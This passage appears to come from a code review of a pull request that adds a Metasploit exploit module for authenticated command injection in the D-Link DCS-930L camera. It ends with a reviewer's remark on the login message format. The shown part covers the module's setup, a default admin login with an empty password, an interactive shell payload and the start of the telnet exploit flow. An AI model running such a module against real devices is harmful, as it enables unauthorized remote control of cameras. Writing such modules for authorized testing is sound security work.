modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb

```diff
@@ -0,0 +1,158 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::Telnet
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link DCS-930L Authenticated Remote Command Execution',
+      'Description' => %q{
+        The D-Link DCS-930L Network Video Camera is vulnerable
+        to OS Command Injection via the web interface.  The vulnerability
+        exists at /setSystemCommand, which is accessible with credentials.
+        This vulnerability was present in firmware version 2.01 and fixed
+        by 2.12.
+      },
+      'Author'      =>
+        [
+          'Nicholas Starke <nick@alephvoid.com>'
+        ],
+      'License'         => MSF_LICENSE,
+      'DisclosureDate'  => 'Dec 20 2015',
+      'Privileged'      => true,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Payload'         =>
+        {
+          'Compat'  => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'Targets'        =>
+        [
+          [  'Automatic',     { } ],
+        ],
+      'DefaultTarget'  => 0
+     ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', ''])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ], self.class)
+  end
+
+  def telnet_timeout
+    (datastore['TelnetTimeout'] || 10)
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25)
+  end
+
+  def exploit
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD'] || ''
+
+    test_login(user, pass)
+    exploit_telnet
+  end
+
+  def test_login(user, pass)
+    print_status("#{peer} - Trying to login with #{user} / #{pass}")
```

Comment:
How about using <code>#{user} : #{pass}</code> instead of? I think it is better though